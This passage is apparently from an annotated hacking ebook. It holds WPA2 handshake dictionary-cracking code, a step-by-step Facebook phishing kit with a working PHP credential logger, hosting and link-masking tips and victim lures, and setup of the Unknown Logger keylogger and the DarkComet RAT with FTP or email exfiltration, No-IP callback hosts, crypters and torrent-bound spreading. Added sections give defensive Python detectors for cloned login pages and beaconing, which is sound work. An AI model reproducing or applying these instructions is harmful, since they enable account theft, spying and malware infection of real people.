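            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the EAPOL frame, first 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def build_msg2_zeroed(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    body = (b"\x02"           # descriptor type: RSN
            + b"\x01\x0a"     # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"     # key length
            + b"\x00" * 8     # replay counter
            + snonce          # client nonce
            + b"\x00" * 16    # key IV
            + b"\x00" * 8     # key RSC
            + b"\x00" * 8     # key ID
            + b"\x00" * 16    # MIC, zero while computing
            + b"\x00\x00")    # key data length
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def try_dictionary(words, ssid, ap_mac, sta_mac, anonce, snonce, eapol_zeroed, mic):
    """Recompute the MIC for each candidate; return the passphrase that matches, or None."""
    for word in words:
        ptk = derive_ptk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol_zeroed), mic):   # KCK = PTK[0:16]
            return word
    return None


# Constructed handshake material (assumed values, not a real capture).
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_ZEROED = build_msg2_zeroed(SNONCE)


def captured_mic(passphrase):
    """The MIC a sniffer would see in message 2 if the network used this passphrase."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], EAPOL_ZEROED)


def demo():
    mic = captured_mic("correct horse")
    return try_dictionary(["password", "12345678", "correct horse", "letmein"],
                          SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_ZEROED, mic)


if __name__ == "__main__":
    print(demo())
```

The 4096 PBKDF2 rounds per candidate are the whole cost of the attack, which is why a wordlist that misses the passphrase fails no matter how long it runs, and why a long random passphrase is out of reach: the derivation is deliberately slow and nothing in the handshake lets you skip it. The pmk_from_passphrase step reproduces the passphrase-to-PSK test vector published in the 802.11i standard, which is a handy sanity check for any reimplementation.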
III. Online accounts
(Facebook, Hotmail, Gmail...)
If you have no idea or any previous experience of account hacking, then READ this:
1- A program or software that automatically hacks accounts when you give it a username or email does NOT exist, so please don't be fooled by the fake YouTube videos.
2- Social engineering, also known as SE, is the art of manipulating/tricking people; usually used to get some information from the victim or trick them into fake logins, keyloggers...
3- Hacking accounts IS a cyber crime and can get you in jail in some countries.
4- "Oh no, my Facebook/Hotmail... account was hacked, how can I hack it back?" Stop whining and use the password recovery button; it is a lot easier than hacking the person who hacked you in the first place.
5- These tutorials are for educational purposes, so don't abuse this knowledge for personal revenge.
Enough said lets move into action.
‐a‐ Phishing
A phishing page is a fake login page that looks exactly like the original one, but once you log in it sends the username and password to the attacker. It is probably the easiest and most effective way to hack an account, but it requires more SE than the other methods.
1‐ What you will need:
‐ Free/paid web hosting.
....Yes, that is all you will need, in addition to a brain and a computer of course.
2‐ Making the fake page:
‐a‐ Choose a website. I will go with Facebook; if you have no knowledge of HTML and PHP, stick to my example so you can follow easily.
‐b‐ Go to the website's login page; in my case it is facebook.com or facebook.com/login.php, both pages have a login form. Then we need the web page's source code: in Firefox just right click and select "View Page Source", or press Ctrl + U. Copy all the code, then paste it into Notepad++ or Notepad.
‐c‐ Now we need to create a PHP file that will receive the data (email/password) posted by the form and write it to a text file. So open a new Notepad window and copy‐paste this code.
<?php
header ('Location: http://');             // redirect the victim right away; fill in the destination after "Location:"
$handle = fopen("logs.txt", "a");         // open the log file for appending (created on first use, next to this script)
foreach($_POST as $variable => $value) {  // one "name=value" line per field the form posted
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");   // separator between two victims
fclose($handle);
exit;                                     // nothing else is sent to the browser
?>
You can edit:
‐ The redirect destination, after "Location:" in the header() line (for example the real login page, so the victim does not notice anything).
‐ The name of the text file holding the emails and passwords, in the fopen() line (original name "logs.txt").
After you have set these options to your liking, save it as something.php (I will name it action.php).
‐d‐ Uploading: first you need to create an account with a web hosting service; here are some free ones:
7ry.us
000webhost.com
freewebhostingarea.com
zymic.com
After you have created an account, create a free domain, then log in to your domain.
Now in your domain's cPanel look for your FTP login details, save them somewhere, then log out.
Search for FileZilla, download it, then use the FTP login details you got from your host to log in.
Now you can easily upload files from your computer (left pane) to the online host (right pane); go ahead and upload the PHP file we created earlier.
The file action.php is now online, so let's get its link: right click the file and select "Copy URL(s) to clipboard".
This gives you the FTP link, but we need the HTTP link, so do the following.
FTP: ftp://user@domain/fileteh/action.php
To get the HTTP link remove everything before the @, including the @. Also, if the link contains "public_html", remove it (that directory is the web root, so it does not appear in HTTP URLs).
So my HTTP link will be: http://domain/fileteh/action.php
‐e‐ Back to the page code; we need to search it for the login form, more specifically for the attribute that tells the browser where to send the request. For Facebook, search the code for:
action="https://www.facebook.com/login.php?login_attempt=1"
Make sure this attribute belongs to the form with id "login_form".
Now replace the link after action=" with the link to your PHP file ("http://domain/fileteh/action.php"). Everything else in the form stays as it is, which is why the PHP script simply logs every field that gets posted.
‐f‐ Obfuscate, then upload. To obfuscate your code go to http://htmlobfuscator.com/, copy all of the modified HTML (web page) code from Notepad into the website and click obfuscate, then copy the obfuscated code back into Notepad and save it as something.html.
Upload your HTML file the same way you did for the PHP file, then get its HTTP URL.
‐g‐ Setting permissions: in FileZilla right click the two files, click "File permissions...", change the value to 777 and click "OK". Be aware of what this means: logs.txt is created in the same web‐accessible directory as action.php, so anyone who guesses its URL can download everything you collected, and 777 makes the files writable by every account on the host as well; the script itself only needs the directory to be writable by the web server user.
‐h‐ Testing: finally you are ready to test the page. Go to the HTML page you uploaded (not the PHP page) and it should look just like Facebook.
Enter any username and password and press login; the page will then redirect you (you can change the redirect destination in the PHP file, see step "c"). Then refresh FileZilla and a new text file should be there with the username and password inside.
Extra:
‐ Masking the link: if your link looks too suspicious you can mask it. That is very easy: go to www.dot.tk and pick a new URL name.
Then in "Forward this domain to" insert the link to the fake page.
Now you can send the .tk link and they will be redirected to the fake page.
‐ Spreading: here comes the SE part. You need to trick the target into logging in with your fake page; you can tell them they will get free Facebook gold or free likes, or just tell them it is a new version of Facebook with lots of new stuff. You won't believe how careless some people are, so come up with a story and make them log in using the fake page.
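The whole trick above is one edited attribute: the copied page still links to the real site everywhere, but its login form now posts somewhere else, over plain HTTP, and the obfuscator hides that from a casual look at the source. Here is an added Python example written for this edition (not from the original book, and not affiliated with Facebook or htmlobfuscator.com) that checks a page for exactly those three signs, which is what an analyst, a mail gateway or a browser extension would look for. The sample pages are constructed: `ORIGINAL` is a minimal stand‐in for the real login page, `CLONED` is the same page after step e, and `OBFUSCATED` wraps it in `document.write(unescape(...))`, which is an assumed layout for what such obfuscators emit.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urljoin, urlsplit


class _PageScan(HTMLParser):
    """Collects the hosts of absolute <a href> links, every <form> (and whether it has a
    password field) and the text of every inline <script>."""

    def __init__(self):
        super().__init__()
        self.link_hosts, self.forms, self.scripts = [], [], []
        self._form, self._script = None, None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and urlsplit(a.get("href", "")).hostname:
            self.link_hosts.append(urlsplit(a["href"]).hostname)
        elif tag == "form":
            self._form = {"id": a.get("id", ""), "action": a.get("action", ""), "password": False}
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["password"] = True
        elif tag == "script":
            self._script = []

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None
        elif tag == "script" and self._script is not None:
            self.scripts.append("".join(self._script))
            self._script = None

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)


# document.write(unescape('...')) wrapper: the body of the page is the %-encoded string literal
_WRAPPED = re.compile(r"""document\.write\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.I | re.S)


def _js_unescape(s):
    """JavaScript unescape(): %uXXXX for UTF-16 code units, %XX for bytes."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def analyze_page(page_url, html, _depth=0):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    scan = _PageScan()
    scan.feed(html)
    findings = []
    page_host = urlsplit(page_url).hostname or ""
    # The "brand" host is where the page's own navigation links go; a copied page keeps them intact
    brand_host = Counter(scan.link_hosts).most_common(1)[0][0] if scan.link_hosts else page_host
    if brand_host != page_host:
        findings.append(f"page served from {page_host!r} but its navigation links point to {brand_host!r}")
    for form in scan.forms:
        if not form["password"]:
            continue
        action = urlsplit(urljoin(page_url, form["action"]))
        if (action.hostname or "") != brand_host:
            findings.append(f"form {form['id']!r} sends a password to {action.geturl()} instead of {brand_host!r}")
        if action.scheme == "http":
            findings.append(f"form {form['id']!r} submits credentials over plaintext HTTP")
    for script in scan.scripts:
        m = _WRAPPED.search(script)
        if m:
            findings.append("page body is hidden inside document.write(unescape(...)); decoding it")
            if _depth < 3:  # decode and scan the real page, guarding against nested wrappers
                findings += analyze_page(page_url, _js_unescape(m.group(2)), _depth + 1)
    return findings


# Constructed stand-in for the real login page (field names and links are illustrative)
ORIGINAL = """<html><head><title>Welcome to Facebook</title></head><body>
<a href="https://www.facebook.com/">Facebook</a>
<a href="https://www.facebook.com/recover/initiate">Forgot your password?</a>
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post">
<input type="text" name="email"> <input type="password" name="pass">
<input type="submit" value="Log In">
</form></body></html>"""

# Step e: the copied page with only the action attribute rewritten (placeholders from the text)
CLONED = ORIGINAL.replace('action="https://www.facebook.com/login.php?login_attempt=1"',
                          'action="http://domain/fileteh/action.php"')

# Step f: the same page wrapped the way a document.write/unescape obfuscator emits it (assumed layout)
OBFUSCATED = ("<html><body><script>document.write(unescape('" + quote(CLONED, safe="")
              + "'))</script></body></html>")

if __name__ == "__main__":
    for url, page in [("https://www.facebook.com/login.php", ORIGINAL),
                      ("http://domain/fileteh/fb.html", CLONED),
                      ("http://domain/fileteh/fb.html", OBFUSCATED)]:
        print(url, analyze_page(url, page) or "clean")
```

The brand‐host heuristic works precisely because the tutorial copies the page verbatim: every link still points at the real site, so a password form whose action goes anywhere else stands out. The dot.tk redirect from the "Extra" part does not change this at all; it only hides the URL in the message, not the page the browser ends up on.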
THE END
‐b‐ Keyloggers
‐1‐ What is a keylogger?
A keylogger runs silently (hidden) on the slave's PC and records all pressed keys, in addition to screenshots/webcam captures, then sends the logs to the hacker. Keyloggers are used to steal passwords or to spy on conversations and user activity.
‐2‐ How to set up a Stealer + Logger?
I will be using "Unknown Logger Public V 1.5", located in the Files folder under the name "Unknown Logger Public V 1.5.rar".
(Credits go to unknowns from hackforums.net for that great free logger.)
This logger has two delivery options: by email or by FTP. I recommend FTP as it is more stable, or use a throwaway email so that if the email is traced they don't get your real one.
1) Using FTP:
First log in to your FTP account (see the previous part, "Phishing", for how to create one) using FileZilla, then create a text file and upload it; let's name it "logs.txt".
Now in the logger fill in the FTP user name and password, and for the URL go to FileZilla and copy the URL of "logs.txt".
For email delivery:
I recommend Gmail. Enter your email and password, choose "smtp.gmail.com", then enter the email address the logs should be sent to. (Don't touch the port.)
Testing the delivery:
For both email and FTP click the "Send: Tags Explanation/Test" button; if everything is OK you will see the confirmation message (it may take up to a minute on a slow connection).
If you check your log file or your email you should see the test message there.
The next step is configuring the Logger and Stealer. First, the Logger: the "Send Logs" option set to 1 means the logger sends its logs every minute; I recommend every 2 or 3 minutes, but it is up to you. The name is simply the name of the virus. Now click the "Settings" button and check "Run on StartUp" under "Extras".
Now for the Stealer, simply check everything in the "Stealers" tab in "Settings". (You can check only one or two options if you don't want the others.)
That is how it should look.
Now give it a name, then click "Build" (it will be built in the same location as the builder).
‐3‐ Spreading
If you want to spread your keylogger successfully you will need to make it FUD (Fully UnDetectable) so that it is not detected and deleted by AV. To do this you will need a FUD crypter; I did not include one with the book because a private FUD crypter costs money.
Your next step is to find somewhere to spread it. Torrents are usually best: find a fresh new program/game/crack/movie..., download it, use a binder to bind the file with your keylogger and start spreading.
You can also use an extension spoofer if you are spreading the keylogger without binding it to another application; this makes it look less suspicious.
‐c‐ Remote Administration Tools
‐1‐ What is a RAT?
RAT stands for Remote Administration Tool or Remote Access Trojan; it is a malware program that gives the hacker access to the victim's computer. RATs usually spread through torrents and pirated/fake software. A system infected by a RAT becomes part of a network of infected machines called a botnet. A botnet can serve several goals, most commonly:
‐ money
‐ DDoS (attacks on websites)
‐2‐ How to set up DarkComet RAT?
DarkComet is one of the best free (public) RATs, but as a public RAT it is easily detected by AV, so consider using a crypter.
General idea of how the RAT works: a RAT has two parts, a client and a server. The server is sent to the victim to infect the computer; the server then tries to establish a connection with the client. The client accepts the connection and relays the hacker's commands back. Note that this naming is the reverse of the usual networking convention: the "server" (the implant on the victim) is the side that initiates the TCP connection, and the "client" (the controller on your machine) is the side that listens. It is similar to multiplayer games, where one person hosts the game (here: the client) and the other players connect to it (here: the servers).
The server needs an IP address and a port to connect to the client. As some of us don't have a static IP (it can change every time you connect to the internet), we use a dynamic DNS host name: the server resolves the host name to find your current IP, and you update the host name every time your IP changes.
What is left is port forwarding on your router, i.e. opening the port so the server can reach the listening client.
a) No‐IP DNS host
To get a free dynamic DNS host name, sign up at www.no‐ip.com, then log in to your account.
Then click "Add a Host".
Enter a host name, leave the host type as DNS Host (A), then click "Create Host".
Now we need to download the No‐IP client so we can update the IP quickly and easily. To do so click "Download Client" in the left panel.
b) Creating the server.
You must know that DarkComet is a RAT and will be detected by your AV, so turn it off or add DarkComet to the exclusions list. Do this inside a dedicated virtual machine rather than on the computer you use every day: you are deliberately running malware with your AV switched off.
Go to the "Files" folder provided with this ebook and extract "DarkCometRAT531.zip", open the folder, run "DarkComet.exe", accept the terms and you are good to go.
To create the server go to: DarkComet‐RAT ‐> Server module (657.50 Kb) ‐> Minimalist (quick), or if you want to fully customize the server choose Full editor (expert).
Set the settings as shown in the picture above; you have to change "IP/DNS" to the No‐IP host name you created earlier, and you can also change the port and the icon if you want. Now click Normal to build the server.
c) Let's open some ports.
Before we can start listening for connections we need to open the port we used for the server, in my case "1604". This can be very easy if your router supports UPnP; either way, follow these steps:
‐ Go to the Socket/Net tab in DarkComet, then right click and add a port.
Enter your port number and make sure "Try to forward automatically (UPnP)" is checked, then click "Listen".
Now we need to check that the port is open: go to www.canyouseeme.org, enter your port number and click "Check Your Port". If you get Success then you are good to go and the port is open.
4‐ Only if automatic forwarding didn't work.
If the previous method didn't work and you got a connection error from canyouseeme.org, refer to this website and choose your router model to forward the port manually (it is pretty easy): http://portforward.com/routers.htm
d) Listening
To listen for connections on a specific port, all you need to do is go to the Socket/Net tab and add a port (same as in the previous step). If you protected your server's connection with a password (only possible in Full editor mode), go to DarkComet‐RAT ‐> Client settings ‐> General settings and enter the password in "Traffic encryption merged key (password)".
e) Testing
The final step is to test that everything works: create a server, remove any option that could harm your computer, run the server on yourself and listen for connections. A few seconds later your computer should appear in the "Users" tab.
To uninstall the RAT from your machine, right click the user ‐> Uninstall Server(s).
‐3‐ Spreading (same as for the keylogger)
You will need to make it FUD (Fully UnDetectable) so that it is not detected and deleted by AV. To do this you will need a FUD crypter; I did not include one with the book because a private FUD crypter costs money.
Your next step is to find somewhere to spread it. Torrents are usually best: find a fresh new program/game/crack/movie..., download it, use a binder to bind the file with your RAT server and start spreading.
You can also use an extension spoofer if you are spreading the server without binding it to another application; this makes it look less suspicious.
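Both tools configured in this chapter leave the same kind of footprint on the network, whatever crypter was used on the file: the logger from the keylogger part uploads to one FTP server (or one SMTP server) every N minutes like clockwork, and the DarkComet server has to resolve and connect to a No‐IP host name on whatever port you chose (1604 above). Here is an added Python example written for this edition (not from the original book, not from Unknown Logger or DarkComet) that runs the two corresponding checks over outbound connection records. The log format and all of the records in `SAMPLE_LOG` are constructed, and `DYNDNS_ZONES` is an assumed, partial list of No‐IP zones that you would extend for your own environment.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Assumed (partial) list of zones handed out by No-IP; add the dynamic-DNS providers you care about.
DYNDNS_ZONES = ("no-ip.org", "no-ip.biz", "no-ip.info", "ddns.net", "hopto.org", "zapto.org", "sytes.net")
# Delivery channels the logger offers: FTP and SMTP
EXFIL_SERVICES = {21: "ftp", 25: "smtp", 465: "smtps", 587: "smtp-submission"}

# Constructed outbound connection records: start_time,source_ip,destination_host,destination_port,bytes_sent
SAMPLE_LOG = """\
2013-05-01T10:00:00,192.168.1.20,ftp.freehost.example,21,1204
2013-05-01T10:00:40,192.168.1.31,coolgamez.no-ip.org,1604,88
2013-05-01T10:01:13,192.168.1.40,mail.example.com,587,52310
2013-05-01T10:02:01,192.168.1.20,ftp.freehost.example,21,1188
2013-05-01T10:03:59,192.168.1.20,ftp.freehost.example,21,1301
2013-05-01T10:06:00,192.168.1.20,ftp.freehost.example,21,1250
2013-05-01T10:08:02,192.168.1.20,ftp.freehost.example,21,1170
2013-05-01T10:09:58,192.168.1.20,ftp.freehost.example,21,1222
2013-05-01T10:27:49,192.168.1.40,mail.example.com,587,4410
2013-05-01T10:31:05,192.168.1.40,mail.example.com,587,960
2013-05-01T10:55:30,192.168.1.40,mail.example.com,587,210
"""


def parse_log(text):
    """Turn the constructed CSV lines into (timestamp, src, dst_host, dst_port, bytes) tuples."""
    rows = []
    for line in text.strip().splitlines():
        ts, src, host, port, nbytes = line.split(",")
        rows.append((datetime.fromisoformat(ts), src, host, int(port), int(nbytes)))
    return rows


def find_beacons(rows, min_hits=4, max_jitter=0.1):
    """A logger set to "send logs every N minutes" produces connections at a near-constant interval.
    Flag every (source, destination, port) with at least min_hits connections whose gaps vary by
    less than max_jitter (standard deviation divided by mean). A person sending mail does not do this."""
    times_by_flow = defaultdict(list)
    for ts, src, host, port, _ in rows:
        times_by_flow[(src, host, port)].append(ts)
    alerts = []
    for (src, host, port), times in times_by_flow.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            alerts.append({"src": src, "dst": f"{host}:{port}", "interval_s": round(avg),
                           "service": EXFIL_SERVICES.get(port, "other")})
    return alerts


def find_dyndns(rows, common_ports=(80, 443)):
    """A RAT server built with a No-IP host name must resolve and connect to that name.
    Flag connections to dynamic-DNS zones once per (source, host, port), and note when the
    port is not a normal web port, as with the 1604 used in the text."""
    alerts, seen = [], set()
    for _, src, host, port, _ in rows:
        zone = next((z for z in DYNDNS_ZONES if host == z or host.endswith("." + z)), None)
        if zone is None or (src, host, port) in seen:
            continue
        seen.add((src, host, port))
        alerts.append({"src": src, "dst": f"{host}:{port}", "zone": zone,
                       "nonstandard_port": port not in common_ports})
    return alerts


if __name__ == "__main__":
    records = parse_log(SAMPLE_LOG)
    for alert in find_beacons(records) + find_dyndns(records):
        print(alert)
```

In the constructed log, 192.168.1.20 uploads to the same FTP server every two minutes (the "Send Logs" setting from the keylogger part), 192.168.1.31 connects once to a No‐IP name on port 1604, and 192.168.1.40 sends mail at irregular times and is left alone. Neither check looks at the executable at all, which is why "FUD" against AV does not help once the thing starts phoning home.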